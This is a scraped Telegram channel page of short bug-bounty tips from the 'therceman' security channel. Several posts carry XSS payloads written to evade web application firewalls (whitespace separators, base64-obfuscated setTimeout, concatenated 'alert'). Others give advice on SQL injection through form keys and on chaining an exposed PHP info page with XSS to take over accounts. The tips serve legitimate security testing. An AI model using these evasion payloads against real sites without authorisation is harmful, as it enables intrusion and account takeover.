en
Feedback
therceman

therceman

Open in Telegram

Bug Bounty & Cyber Security

Show more
The country is not specifiedTechnologies & Applications35 003
2 256
Subscribers
No data24 hours
No data7 days
+530 days
Posts Archive
Happy New Year! πŸŽ‰

TryHackMe Room πŸ”— https://lnkd.in/dddbzjUb Python Scanner πŸ”— https://lnkd.in/d44YnG9U Cheers! #BAC
TryHackMe Room πŸ”— https://lnkd.in/dddbzjUb Python Scanner πŸ”— https://lnkd.in/d44YnG9U Cheers! #BAC

#XSS
#XSS

Bug Bounty Tip Bypass XSS WAF protection using Whitespace Separators between a JS function name and parameters Refer to the a
Bug Bounty Tip Bypass XSS WAF protection using Whitespace Separators between a JS function name and parameters <img/src/onerror=alert&#xFEFF;(1337)> Refer to the attached image for the full list of Whitespace Separators. P.S. can be used before function name too. Cheers!

Bug Bounty Tip When testing an app for SQL injection, don't forget to check the form keys in addition to the values Sometimes
Bug Bounty Tip When testing an app for SQL injection, don't forget to check the form keys in addition to the values Sometimes, developers may overlook applying protection to form keys To bypass spaces, you can use the encoded tab %09. For other symbols, simply URL encode them #SQLinjection

#XSS
<img/src/onerror=setTimeout(atob(/YWxlcnQoMTMzNyk/.source))> #XSS

<img/src/onerror=setTimeout(atob(/YWxlcnQoMTMzNyk/.source))> #XSS

#DefaultCreds
#DefaultCreds

#XSS
#XSS

#XSS
#XSS

#XSS
#XSS

- (function(x){this[x+`ert`](1)})`al` - window[`al`+/e/[`ex`+`ec`]`e`+`rt`](2) - document['default'+'View'][`\u0061lert`](3)
- (function(x){this[x+`ert`](1)})`al` - window[`al`+/e/[`ex`+`ec`]`e`+`rt`](2) - document['default'+'View'][`\u0061lert`](3) #XSS

#XSS
#XSS

#XSS
#XSS

#XSS #CRLF
#XSS #CRLF

#XSS #SQLi #SSTI #CSTI
#XSS #SQLi #SSTI #CSTI

Text version can be found on X https://x.com/therceman/status/1711828964103147871 #WAF
Text version can be found on X https://x.com/therceman/status/1711828964103147871 #WAF

Bug Bounty Tip PHP Info Page Exposure. There's a lot of sensitive information that can be obtained from an exposed PHP Info p
Bug Bounty Tip PHP Info Page Exposure. There's a lot of sensitive information that can be obtained from an exposed PHP Info page, from configuration secrets to exposed user session cookies. For example, when chained with XSS, this can lead to a full account takeover. Cheers! #Recon #XSS #InformationDisclosure